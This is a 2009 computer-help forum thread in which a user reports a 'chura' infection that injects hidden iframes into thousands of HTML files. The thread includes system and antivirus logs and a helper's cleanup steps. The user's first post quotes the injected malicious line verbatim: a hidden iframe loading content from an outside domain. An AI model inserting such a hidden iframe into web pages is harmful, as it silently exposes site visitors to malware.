Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


<iframe> chura virus

  • Please log in to reply
7 replies to this topic

#1 Straydog


  • Members
  • 13 posts
  • Gender:Male
  • Local time:10:24 PM

Posted 04 July 2009 - 01:00 PM


Two days ago AVG’s resident shield announced a chura virus when opening Firefox. I searched and found the line <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> in a HTML file just before the body closing tag. I made a search with Vista search (very slow) and found 59 HTML files with the same code on the same place. I scanned the computer with AVG and then with Anti-Malware, Ad-Aware and SUPERAntiSpyware. No way, they found just a few small problems that were taken care of. I removed that line of code from all files, but when I made another search there were over 150 infected files. I repeated the cycle (search, clean the files by hand, AVG and the others). This time AV and AS found nothing! I made a third search and now there were nearly 2000 infected HTML files. I can’t clean so many files by hand, and from the previous experiences it was worthless because all the files I had cleaned were infected again.

I have a site and its files on my computer are now infected. I cannot access the site because I am sure to spread the virus all over and also distribute the virus to whoever visits. Not better is the fact that I save many files in HTML because I find it practical, so I have many HTML files. Even worse is that the infection is not on the start up HD with the OS where I could just reformat and reinstall or replace with a saved image, but on another HD where I have all my files and the site files. The C: disk has only the OS and all programs but one (Firefox profile in use).

I searched and searched with Google for a solution. I read many threads on the issue, but no result. However, there must be a way to kill this virus hiding from AV and AS applications.

Can someone, please help me to stop the spread? Is there a way to clean the files and keep them effectively clean? Is it possible to clean the files in batches, because they are too many to do it by hand? I do need to do this or else I will lose my entire private HTML and HTML based files, some of them kept for many years. I cannot replace them as with the OS and program files; they are not reinstallable. At this moment only HTML and a few JS files of Firefox are infected, but I think all HTML based files are at great risk.

Thank you very much for the needed help. :thumbup2:

DDS file

DDS (Ver_09-06-26.01) - NTFSx86
Run by Administrator at 14:26:49,03 on 04-07-2009
Internet Explorer: 8.0.6001.18783
Microsoft® Windows Vista™ Ultimate 6.0.6002.2.1252.44.1033.18.1983.827 [GMT 1:00]

AV: Lavasoft Ad-Watch Live! Anti-Virus *On-access scanning enabled* (Updated) {A1C4F2E0-7FDE-4917-AFAE-013EFC3EDE33}
SP: Lavasoft Ad-Watch Live! *enabled* (Updated) {67844DAE-4F77-4D69-9457-98E8CFFDAA22}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}
SP: SUPERAntiSpyware *enabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}

============== Running Processes ===============

C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\microsoft office\Office12\OUTLOOK.EXE
C:\Program Files\Microsoft Office\Office12\WINWORD.EXE

============== Pseudo HJT Report ===============

uStart Page = about:blank
uURLSearchHooks: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
uURLSearchHooks: H - No File
uURLSearchHooks: ICQToolBar: {855f3b16-6d32-4fe6-8a56-bbb695989046} - c:\program files\icq6toolbar\ICQToolBar.dll
BHO: &Yahoo! Toolbar Helper: {02478d38-c3f9-4efb-9b51-7695eca05670} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\progextr\media\realplayer\rpbrowserrecordplugin.dll
BHO: {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - No File
BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\progextr\control\avg\avgssie.dll
BHO: Java™ Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
BHO: SingleInstance Class: {fdad4da1-61a2-4fd8-9c17-86f7ac245081} - c:\progra~1\yahoo!\companion\installs\cpn\YTSingleInstance.dll
TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
TB: ICQToolBar: {855f3b16-6d32-4fe6-8a56-bbb695989046} - c:\program files\icq6toolbar\ICQToolBar.dll
EB: ICQToolBar: {855f3b16-6d32-4fe6-8a56-bbb695989046} - c:\program files\icq6toolbar\ICQToolBar.dll
mRun: [WinPatrol] c:\progextr\control\winpatrol\winpatrol.exe -expressboot
mRunOnce: [Malwarebytes' Anti-Malware] c:\progextr\control\anti-malware\mbamgui.exe /install /silent
mRunOnce: [Malwarebytes Anti-Malware (reboot)] "c:\progextr\control\anti-malware\mbam.exe" /runcleanupscript
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: {6224f700-cba3-4071-b251-47cb894244cd} - c:\progextr\icq\ICQ.exe
IE: {E59EB121-F339-4851-A3BA-FE49C35617C2} - c:\progextr\icq6.5\ICQ.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office12\REFIEBAR.DLL
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_14-windows-i586.cab
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_14-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_14-windows-i586.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\progextr\control\avg\avgpp.dll
Notify: !SASWinLogon - c:\progextr\control\superantispyware\SASWINLO.dll
AppInit_DLLs: avgrsstx.dll
STS: Windows DreamScene: {e31004d1-a431-41b8-826f-e902f9d95c81} - %SystemRoot%\System32\DreamScene.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\progextr\control\superantispyware\SASSEH.DLL

================= FIREFOX ===================

FF - ProfilePath - c:\users\admini~1\appdata\roaming\mozilla\firefox\profiles\0az7y586.default\
FF - plugin: c:\progextr\firefox\plugins\NPGetRt.dll
FF - plugin: c:\progextr\music\vistacodecpack\rm\browser\plugins\nppl3260.dll
FF - plugin: c:\progextr\music\vistacodecpack\rm\browser\plugins\nprpjplug.dll
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
FF - HiddenExtension: Java Console: No Registry Reference - c:\progextr\firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}

c:\progextr\firefox\greprefs\all.js - pref("media.enforce_same_site_origin", false);
c:\progextr\firefox\greprefs\all.js - pref("media.cache_size", 51200);
c:\progextr\firefox\greprefs\all.js - pref("media.ogg.enabled", true);
c:\progextr\firefox\greprefs\all.js - pref("media.wave.enabled", true);
c:\progextr\firefox\greprefs\all.js - pref("media.autoplay.enabled", true);
c:\progextr\firefox\greprefs\all.js - pref("browser.urlbar.autocomplete.enabled", true);
c:\progextr\firefox\greprefs\all.js - pref("capability.policy.mailnews.*.wholeText", "noAccess");
c:\progextr\firefox\greprefs\all.js - pref("dom.storage.default_quota", 5120);
c:\progextr\firefox\greprefs\all.js - pref("content.sink.event_probe_rate", 3);
c:\progextr\firefox\greprefs\all.js - pref("network.http.prompt-temp-redirect", true);
c:\progextr\firefox\greprefs\all.js - pref("layout.css.dpi", -1);
c:\progextr\firefox\greprefs\all.js - pref("layout.css.devPixelsPerPx", -1);
c:\progextr\firefox\greprefs\all.js - pref("gestures.enable_single_finger_input", true);
c:\progextr\firefox\greprefs\all.js - pref("dom.max_chrome_script_run_time", 0);
c:\progextr\firefox\greprefs\all.js - pref("network.tcp.sendbuffer", 131072);
c:\progextr\firefox\greprefs\all.js - pref("geo.enabled", true);
c:\progextr\firefox\greprefs\security-prefs.js - pref("security.remember_cert_checkbox_default_setting", true);
c:\progextr\firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr", "moz35");
c:\progextr\firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr-cjkt", "moz35");
c:\progextr\firefox\defaults\pref\firefox.js - pref("extensions.blocklist.level", 2);
c:\progextr\firefox\defaults\pref\firefox.js - pref("browser.urlbar.restrict.typed", "~");
c:\progextr\firefox\defaults\pref\firefox.js - pref("browser.urlbar.default.behavior", 0);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.history", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.formdata", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.passwords", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.downloads", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.cookies", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.cache", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.sessions", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.offlineApps", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.siteSettings", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.history", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.formdata", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.passwords", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.downloads", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.cookies", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.cache", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.sessions", true);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.offlineApps", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.cpd.siteSettings", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("privacy.sanitize.migrateFx3Prefs", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("browser.ssl_override_behavior", 2);
c:\progextr\firefox\defaults\pref\firefox.js - pref("security.alternate_certificate_error_page", "certerror");
c:\progextr\firefox\defaults\pref\firefox.js - pref("browser.privatebrowsing.autostart", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("browser.privatebrowsing.dont_prompt_on_enter", false);
c:\progextr\firefox\defaults\pref\firefox.js - pref("geo.wifi.uri", "https://www.google.com/loc/json");

============= SERVICES / DRIVERS ===============

R0 Lbd;Lbd;c:\windows\system32\drivers\Lbd.sys [2009-6-21 64160]
R1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2009-6-19 327688]
R1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\system32\drivers\avgtdix.sys [2009-6-19 108552]
R1 SASDIFSV;SASDIFSV;c:\progextr\control\superantispyware\sasdifsv.sys [2008-8-19 8944]
R1 SASKUTIL;SASKUTIL;c:\progextr\control\superantispyware\SASKUTIL.SYS [2008-8-19 55024]
R2 avg8wd;AVG Free8 WatchDog;c:\progextr\control\avg\avgwdsvc.exe [2009-6-19 298776]
R2 Lavasoft Ad-Aware Service;Lavasoft Ad-Aware Service;c:\program files\lavasoft\ad-aware\AAWService.exe [2009-1-18 1003344]
R3 FETND6V;VIA Rhine Family Fast Ethernet Adapter Driver;c:\windows\system32\drivers\fetnd6v.sys [2009-5-23 43520]
R3 S3GIGP;S3GIGP;c:\windows\system32\drivers\VTGKModeDX32.sys [2009-5-23 833024]
R3 SASENUM;SASENUM;c:\progextr\control\superantispyware\SASENUM.SYS [2008-8-19 7408]
R3 SUSCOM;Susteen Serial port driver;c:\windows\system32\drivers\SUSCOM.SYS [2009-5-23 40448]
R3 VST_DPV;VST_DPV;c:\windows\system32\drivers\VSTDPV3.SYS [2008-1-21 987648]
R3 VSTHWBS2;VSTHWBS2;c:\windows\system32\drivers\VSTBS23.SYS [2008-1-21 251904]

=============== Created Last 30 ================

2009-07-04 03:05 61,440 a------- c:\windows\system32\drivers\nugna.sys
2009-07-04 02:23 <DIR> --d----- c:\users\admini~1\appdata\roaming\Malwarebytes
2009-07-04 02:23 38,160 a------- c:\windows\system32\drivers\mbamswissarmy.sys
2009-07-04 02:23 19,096 a------- c:\windows\system32\drivers\mbam.sys
2009-07-04 02:23 <DIR> --d----- c:\programdata\Malwarebytes
2009-07-04 02:23 <DIR> --d----- c:\progra~2\Malwarebytes
2009-07-03 16:50 <DIR> --d----- c:\programdata\SUPERAntiSpyware.com
2009-07-03 16:50 <DIR> --d----- c:\progra~2\SUPERAntiSpyware.com
2009-07-03 16:39 <DIR> --d----- c:\users\admini~1\appdata\roaming\SUPERAntiSpyware.com
2009-07-03 16:35 <DIR> --d----- c:\program files\common files\Wise Installation Wizard
2009-07-03 02:08 <DIR> --dsh--- C:\found.000
2009-06-27 22:36 <DIR> --d----- c:\program files\ICQ6Toolbar
2009-06-27 22:36 <DIR> --d----- c:\programdata\ICQ
2009-06-27 22:36 <DIR> --d----- c:\progra~2\ICQ
2009-06-25 21:44 <DIR> --d----- c:\program files\common files\xing shared
2009-06-24 15:38 15,688 a------- c:\windows\system32\lsdelete.exe
2009-06-23 02:53 <DIR> --d-h--- C:\$AVG8.VAULT$
2009-06-21 20:23 <DIR> --d----- c:\program files\AVG
2009-06-21 04:09 64,160 a------- c:\windows\system32\drivers\Lbd.sys
2009-06-21 04:06 <DIR> -cd-h--- c:\programdata\{83C91755-2546-441D-AC40-9A6B4B860800}
2009-06-21 04:06 <DIR> -cd-h--- c:\progra~2\{83C91755-2546-441D-AC40-9A6B4B860800}
2009-06-21 02:32 <DIR> --d----- c:\programdata\Lavasoft
2009-06-21 02:32 <DIR> --d----- c:\program files\Lavasoft
2009-06-19 05:22 11,952 a------- c:\windows\system32\avgrsstx.dll
2009-06-19 05:22 108,552 a------- c:\windows\system32\drivers\avgtdix.sys
2009-06-19 05:22 327,688 a------- c:\windows\system32\drivers\avgldx86.sys
2009-06-19 05:22 <DIR> --d----- c:\windows\system32\drivers\Avg
2009-06-19 05:21 <DIR> --d----- c:\programdata\avg8
2009-06-19 05:21 <DIR> --d----- c:\progra~2\avg8
2009-06-19 03:13 <DIR> --d----- c:\program files\AdminTempl_CutomTools
2009-06-19 02:40 784,896 a------- c:\windows\system32\rpcrt4.dll
2009-06-19 02:35 <DIR> --d----- c:\windows\PCHEALTH
2009-06-07 04:10 <DIR> --d----- c:\programdata\Nitro PDF
2009-06-07 04:10 <DIR> --d----- c:\program files\common files\Nitro PDF
2009-06-07 04:10 <DIR> --d----- c:\program files\common files\BCL Technologies
2009-06-07 04:06 <DIR> --d----- c:\windows\Downloaded Installations
2009-06-07 02:28 <DIR> --d----- C:\tmp
2009-06-05 19:24 <DIR> --d----- c:\programdata\Yahoo! Companion
2009-06-05 19:23 <DIR> --d----- c:\programdata\Yahoo!
2009-06-05 19:23 <DIR> --d----- c:\program files\Yahoo!

==================== Find3M ====================

2009-06-27 14:29 86,016 a------- c:\windows\inf\infstrng.dat
2009-06-27 14:29 51,200 a------- c:\windows\inf\infpub.dat
2009-06-04 02:22 86,016 a------- c:\windows\inf\infstor.dat
2009-06-04 02:12 665,600 a------- c:\windows\inf\drvindex.dat
2009-06-02 18:44 457 a------- c:\program files\INSTALL.LOG
2009-06-01 12:58 410,984 a------- c:\windows\system32\deploytk.dll
2009-05-22 20:24 21,412 a------- c:\windows\system32\emptyregdb.dat
2009-05-13 13:55 319,456 a------- c:\windows\DIFxAPI.dll
2009-05-12 15:56 85,504 a------- c:\windows\system32\ff_vfw.dll
2009-05-09 06:50 915,456 a------- c:\windows\system32\wininet.dll
2009-05-09 06:34 71,680 a------- c:\windows\system32\iesetup.dll
2009-05-08 18:18 1,034,752 a------- c:\windows\system32\VSFilter.dll
2009-05-06 14:54 1,152,032 a------- c:\windows\system32\RtkPgExt.dll
2009-05-06 14:54 56,352 a------- c:\windows\system32\RtkCoInst.dll
2009-05-06 14:54 326,176 a------- c:\windows\system32\RtkApoApi.dll
2009-05-06 14:54 2,534,944 a------- c:\windows\system32\RtkAPO.dll
2009-04-23 13:14 623,616 a------- c:\windows\system32\localspl.dll
2009-04-21 12:39 2,034,688 a------- c:\windows\system32\win32k.sys
2009-04-16 17:23 540,672 a------- c:\windows\RtlExUpd.dll
2009-04-11 07:33 986,600 a------- c:\windows\system32\winload.exe
2009-04-11 07:33 926,184 a------- c:\windows\system32\winresume.exe
2009-04-11 07:33 614,376 a------- c:\windows\system32\ci.dll
2009-04-11 07:32 50,664 a------- c:\windows\system32\PSHED.DLL
2009-04-11 07:32 3,601,896 a------- c:\windows\system32\ntkrnlpa.exe
2009-04-11 07:32 3,549,672 a------- c:\windows\system32\ntoskrnl.exe
2009-04-11 07:32 438,744 a------- c:\windows\system32\mcupdate_GenuineIntel.dll
2009-04-11 07:32 245,736 a------- c:\windows\system32\clfs.sys
2009-04-11 07:32 177,128 a------- c:\windows\system32\halmacpi.dll
2009-04-11 07:32 140,776 a------- c:\windows\system32\halacpi.dll
2009-04-11 07:32 17,896 a------- c:\windows\system32\kd1394.dll
2009-04-11 07:32 19,944 a------- c:\windows\system32\kdusb.dll
2009-04-11 07:32 17,384 a------- c:\windows\system32\kdcom.dll
2009-04-11 07:27 627,200 a------- c:\windows\system32\sethc.exe
2009-04-11 07:22 7,168 a------- c:\windows\system32\f3ahvoas.dll
2009-04-11 07:21 37,376 a------- c:\windows\system32\cdd.dll
2009-04-11 06:03 12,240,896 a------- c:\windows\system32\NlsLexicons0007.dll
2009-04-11 06:03 2,644,480 a------- c:\windows\system32\NlsLexicons0009.dll
2009-04-11 05:57 8,147,456 a------- c:\windows\system32\wmploc.DLL
2009-04-11 05:54 2,048 a------- c:\windows\system32\mferror.dll
2009-04-11 05:39 16,384 a------- c:\windows\system32\iscsilog.dll
2009-04-11 05:27 2,560 a------- c:\windows\system32\msimsg.dll
2009-04-11 05:23 289,792 a------- c:\windows\system32\atmfd.dll
2009-04-11 05:12 617,984 a------- c:\windows\system32\adtschema.dll
2009-04-11 02:59 107,612 a------- c:\windows\system32\StructuredQuerySchema.bin
2008-01-21 03:41 174 a--sh--- c:\program files\desktop.ini
2006-11-02 13:40 287,440 a------- c:\windows\inf\perflib\0409\perfi.dat
2006-11-02 13:40 287,440 a------- c:\windows\inf\perflib\0409\perfh.dat
2006-11-02 13:40 30,674 a------- c:\windows\inf\perflib\0409\perfd.dat
2006-11-02 13:40 30,674 a------- c:\windows\inf\perflib\0409\perfc.dat
2006-11-02 10:20 287,440 a------- c:\windows\inf\perflib\0000\perfi.dat
2006-11-02 10:20 287,440 a------- c:\windows\inf\perflib\0000\perfh.dat
2006-11-02 10:20 30,674 a------- c:\windows\inf\perflib\0000\perfd.dat
2006-11-02 10:20 30,674 a------- c:\windows\inf\perflib\0000\perfc.dat
2008-11-13 13:27 8,192 a--sh--- c:\windows\users\default\NTUSER.DAT

============= FINISH: 14:27:42,79 ===============

AVS Resident Shield repport

Infection Trojan horse Generic13BMLW C:\Windows\msa.exe

Virus found HTML/Framer D:\WinFiles\Internet\FfoxCommonProfile\Cache\21F8A78Cd01 Deleted 04-07-2009

Potentially harmful program Fake_AntiSpyware.COQ C:\Windows\System32\msxml71.dll Deleted 24-06-2009, 15:12:19 file C:\Windows\System32\svchost.exe

Potentially harmful program Fake_AntiSpyware.COQ C:\Windows\System32\msxml71.dll Deleted 24-06-2009, 15:11:35 file C:\Windows\System32\svchost.exe

Potentially harmful program Fake_AntiSpyware.COQ C:\Windows\System32\msxml71.dll Deleted 24-06-2009, 14:16:01 file C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe

Note: There isn't any mention to the lot of infected HTML files.

Anti-Malware report 1 – D: drive

Malwarebytes' Anti-Malware 1.38
Database version: 2370
Windows 6.0.6002 Service Pack 2

04-07-2009 03:04:24
mbam-log-2009-07-04 (03-04-24).txt

Scan type: Full Scan (D:\|)
Objects scanned: 132664
Time elapsed: 28 minute(s), 33 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 3
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Anti-Malware report 2 – C: drive

Malwarebytes' Anti-Malware 1.38
Database version: 2370
Windows 6.0.6002 Service Pack 2

04-07-2009 04:24:27
mbam-log-2009-07-04 (04-24-27).txt

Scan type: Full Scan (C:\|)
Objects scanned: 191454
Time elapsed: 1 hour(s), 13 minute(s), 5 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

I can't find a way to get to the logs of SuperAntiware and Ad-Aware, but none of them refers to the added code to HTML files. :) :)

Attached Files

BC AdBot (Login to Remove)


#2 Jintan


  • Malware Response Team
  • 531 posts
  • Local time:06:24 PM

Posted 06 July 2009 - 08:28 PM

Hello Straydog,

In checking web references on the type of infection you posted here I see, as you probably have, a trail of discussions going back to perhaps March, and few with any direct confirmation of the infection sources, or complete solutions. However, in some of that web info I see references to "Virto" which is a form of the Virut file infector malware (see here). Virto/Virut injects it's code into all of certain file types on systems, and is so pervasive and elusive in activities that the only best option for a solution is to reformat and reinstall, and all without saving any personal data from the system. If I were a site owner (and I am) and knew my system was infected with such a virulent malware (which has happened to one of my systems), I would reformat and reinstall, and regroup after as far as how to return needed settings and softwares etc.

We can do some scan/checks here to see what all still needs cleaning, but up front, should there be any verification of Virto involvement I will end all assistance, with the correct suggestion of that reformat/reinstall solution.

For the website, send me via PM the site name, so I can evaluate it's current status. Plan to only access that site from some other computer that is known to be malware free, and also has not been used before to access the site's web program (such as cPanel). From a different computer right now, change all control panel/site passwords. You can assume the site's security has been compromised by your computer being compromised.

Right off, although I do not promote the use of one antivirus over another, I am aware that Avast was correctly locating some of this type code infection early on, and was the first to update their databases for a very recent Gumblar-type malware. As such, I suggest you consider uninstalling your existing antivirus software, and installing the free version of Avast (download here - scroll down and select the full installer file "avast! Home Edition - English (33.64 MB)"). Be very sure to uninstall the existing AV software before beginning the install of the new one.

During the Avast install OK it doing a initial boot scan, complete the install and then reboot the computer. At bootup Avast will start a scan. Once it locates and infected file, select the option to have it move all files it locates to it's quarantine, and allow it to finish scanning and the system boot up.


After the bootup Download Dr.Web CureIt! from here to your Desktop.

When you have done this, boot into safe mode (restart your computer and tap F8 continuously as it restarts)

Doubleclick the drweb-cureit.exe file. Click on Start and Ok and allow it to run the express scan. This is a short scan and will scan all files currently running in memory. If something is found, click the Yes button when it asks you if you want to cure it.

Once the short scan has finished, click on Custom Scan and choose the drives that you want to scan. Click on the drive to select it. A red dot shows which drives have been chosen (if only one drive you will not be shown these options). Click the green arrow > to the right and the scan will begin. At the first sign of infection, Select 'Yes to all' if it asks if you want to cure/move the file.

When the scan has finished, click the "Select all" button and then click on the Move button. This will move any infected files to the %userprofile%\DoctorWeb\quarantine folder.

Next and this is important, from the main Dr.Web CureIt menu (top left), click File and choose save report list and save the report to your desktop. The report will be called DrWeb.csv and it can be opened in Notepad.

Close Cureit and restart your computer to completely remove any stubborn files. You may get a message saying "No operations performed with some objects in list. Exit program". If so, click "Yes" (You may get a popup offering you a discount if you purchase DrWeb AntiVirus. You may or may not wish to take advantage of this offer later but for now, just close the popup and wait for the scan to finish).

Please post the log in this thread. If it is an extremely large log due to it locating many infection altered files, just post back in general what type of infection it was addressing.


To keep them from interfering with the repairs, be sure to temporarily disable all antivirus/anti-spyware softwares while these steps are being completed. This can usually be done through right clicking the software's Taskbar icons, or accessing each software through Start - Programs.

Download ComboFix.exe from here to your desktop, but I would like you to rename the file as you download it (do not download it directly without renaming it - use right click "Save Target/Link As" ). For this, rename the downloading file to 456out.com, then click the renamed 456out.com to run that scan.

Be sure to install the Recovery Console if you are asked to do so. When the scan completes, a text window with your log will open. Please copy and paste that log back here.

A caution - do not touch your mouse/keyboard until the scan has completed. The scan will temporarily disable your desktop, and if interrupted may leave your desktop disabled. If this occurs, please reboot to restore the desktop.

Allow the scan to run. When completed a text window will appear - please copy/paste the contents back here. This log can also be found at C:\ComboFix.txt.


Post that log and the Dr. Web log please.

Edited by Jintan, 06 July 2009 - 08:29 PM.

Ad eundum quo no duck ante iit

#3 Straydog

  • Topic Starter

  • Members
  • 13 posts
  • Gender:Male
  • Local time:10:24 PM

Posted 12 July 2009 - 04:36 PM

Hello Jintan,

I think the virus has somehow disappeared, probable taken away by the several virus scans both before na after I started following the steps you described. With windows Vista lousy search I searches for files containing the virus code. The search was very slow. I found more than 3000. At the beginning, I cleaned the code but it came back to the same files, but after some virus scans it didn't come back. So I cleaned them all, some before the first step (Avast), some after. This operation took me all the days that elapsed since your answer.

Then I went to step two, but I couldn't do it until now. After the first short scan, I tried the second one four times, but I could finish scanning only once and only one drive, just a small part. The first time the computer rebooted by itself shortly after starting the scan. The second time it went on for about 15% to 20%; it crashed and I received a notice saying the program had stopped working. It seems to be a signature problem and I am enclosing that Windows message text at the end of this post. The third time it rebooted again and restarted just as the first. The fourth time I tried to start Windows with "Disable driver signature enforcement, but it didn't make any difference. In all I could only finish the D: driver (not with the OS), and it didn't find any virus. Even like that it cached four viruses at the second failed scan, but I am not sure they will be real viruses because they are as follows:
  • A NetFramework file I downloaded from Microsoft;
  • Google desktop setup file (not installed) that I downloaded from Google for trying to find the HTML infected file, but did not use;
  • A setup multi-timer downloaded from NIST Internet Time Servers (tf.nist.gov);
  • The Vista Smoker Pro tweaker setup file (not installed).
I could get only the D: drive log file. For the above four mentioned "viruses" I read on the app window before it crashed as Trojan Horses. The final part the log is at the end of this post.

Now, I do need you advice, please. How can I perform the Dr.CureIt scan? Shell I divide it into small parts? It doesn't seem to be a good idea. Skipping this step doesn't seem good either. How can I do so the program does not stop or make the computer reboot? I want to go on with your recommendations and finish with this once for good. Kindly, tell me what to do.


Windows crash notice

Problem signature:
Problem Event Name: APPCRASH
Application Name: 63u98.exe
Application Version:
Application Timestamp: 4a4a4355
Fault Module Name: StackHash_2123
Fault Module Version:
Fault Module Timestamp: 00000000
Exception Code: c0000005
Exception Offset: 021f8335
OS Version: 6.0.6002.
Locale ID: 2057
Additional Information 1: 2123
Additional Information 2: b3591988e304315642be1a367fd17ef9
Additional Information 3: dd87
Additional Information 4: a3d98e3a91e61ad7c7bfd6c03baa5180

Read our privacy statement:


D: drive scan results

Scan statistics
Scanned: 233743
Infected: 0
Modifications: 0
Suspicious: 3
Adware: 0
Dialers: 0
Jokes: 0
Riskware: 0
Hacktools: 0
Cured: 0
Deleted: 0
Renamed: 0
Moved: 0
Ignored: 0
Scan speed: 113 Kb/s
Scan time: 01:22:31

#4 Jintan


  • Malware Response Team
  • 531 posts
  • Local time:06:24 PM

Posted 17 July 2009 - 03:34 PM

As I just posted in one other thread I had opened here Straydog, I got busy elsewhere and just wandered away here without catching or replying to your response. As it has been a few days post back an update on your current repair status there, and if you still need assistance we can work from there.
Ad eundum quo no duck ante iit

#5 Straydog

  • Topic Starter

  • Members
  • 13 posts
  • Gender:Male
  • Local time:10:24 PM

Posted 17 July 2009 - 09:10 PM

Thank you Jintan,
I need your advice for the end of my post, please.

Now, I do need you advice, please. How can I perform the Dr.CureIt scan? Shell I divide it into small parts? It doesn't seem to be a good idea. Skipping this step doesn't seem good either. How can I do so the program does not stop or make the computer reboot? I want to go on with your recommendations and finish with this once for good. Kindly, tell me what to do.

Shall I skip this step? I think it's rather better to go through all the steps you recommended.
Thanks and have a nice weekend.

#6 Jintan


  • Malware Response Team
  • 531 posts
  • Local time:06:24 PM

Posted 17 July 2009 - 09:26 PM

